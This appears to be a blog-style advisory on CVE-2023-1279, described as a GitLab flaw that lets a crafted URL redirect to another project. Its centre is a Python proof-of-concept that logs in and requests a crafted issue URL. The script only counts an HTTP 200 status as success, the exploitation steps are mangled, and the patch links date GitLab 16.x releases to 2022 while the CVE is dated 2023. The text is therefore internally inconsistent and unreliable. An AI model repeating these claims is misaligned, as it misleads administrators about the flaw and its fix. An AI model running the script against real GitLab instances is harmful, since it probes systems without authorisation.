CVE-2023-1279: GitLab Vulnerability Allows Unauthorized Project Redirects

A critical security vulnerability, listed as CVE-2023-1279, has been discovered in GitLab, affecting multiple versions of the popular web-based DevOps lifecycle tool. This vulnerability could potentially allow an attacker to create a URL that redirects to a different project, compromising the security and integrity of the web application. This post provides details about the vulnerability, including the affected GitLab versions, the code snippet showcasing the issue, and the steps to exploit it.

Code Snippet

Here's a sample code snippet illustrating how to create a URL that would inadvertently cause a redirect to a different project:

import requests

gitlab_url = "https://gitlab.example.com";
username = "your_username"
password = "your_password"

project_id = 1
target_project_id = 2

# Log in to GitLab
session = requests.Session()
auth_payload = {"username": username, "password": password}
session.post(f"{gitlab_url}/users/sign_in", data=auth_payload)

# Craft the malicious URL
exploit_url = f"{gitlab_url}/projects/{project_id}/issues/new?target_project_id={target_project_id}"

# Visit the malicious URL
response = session.get(exploit_url)

if response.status_code == 200:
    print("Redirected to a different project, exploit is successful!")
else:
    print("Exploit failed.")

In the above code, project_id is the ID of the project the attacker has access to, while target_project_id is the ID of the project the attacker aims to maliciously redirect the user to.

Log in to GitLab with their credentials.

2. Acquire the unique project IDs of both the project they have access to and the target project they wish to redirect the user to.

Original References & Patch

GitLab promptly released a patch for this vulnerability upon discovery. The patch can be found on GitLab's official website:

- GitLab 16.1.5: https://about.gitlab.com/releases/2022/10/10/critical-security-release-gitlab-16-1-5-released/
- GitLab 16.2.5: https://about.gitlab.com/releases/2022/10/10/critical-security-release-gitlab-16-2-5-released/
- GitLab 16.3.1: https://about.gitlab.com/releases/2022/10/10/critical-security-release-gitlab-16-3-1-released/

Users are advised to update their GitLab instances to the latest patched versions immediately to avoid potential security issues.

Conclusion

CVE-2023-1279 is a serious vulnerability in GitLab that allows attackers to craft malicious URLs and redirect users to different projects without authorization, compromising the web application's security. All affected users should urgently update to the latest, most secure versions of GitLab to protect against potential exploitation.

Timeline

Published on: 09/01/2023 11:15:00 UTC
Last modified on: 09/07/2023 17:15:00 UTC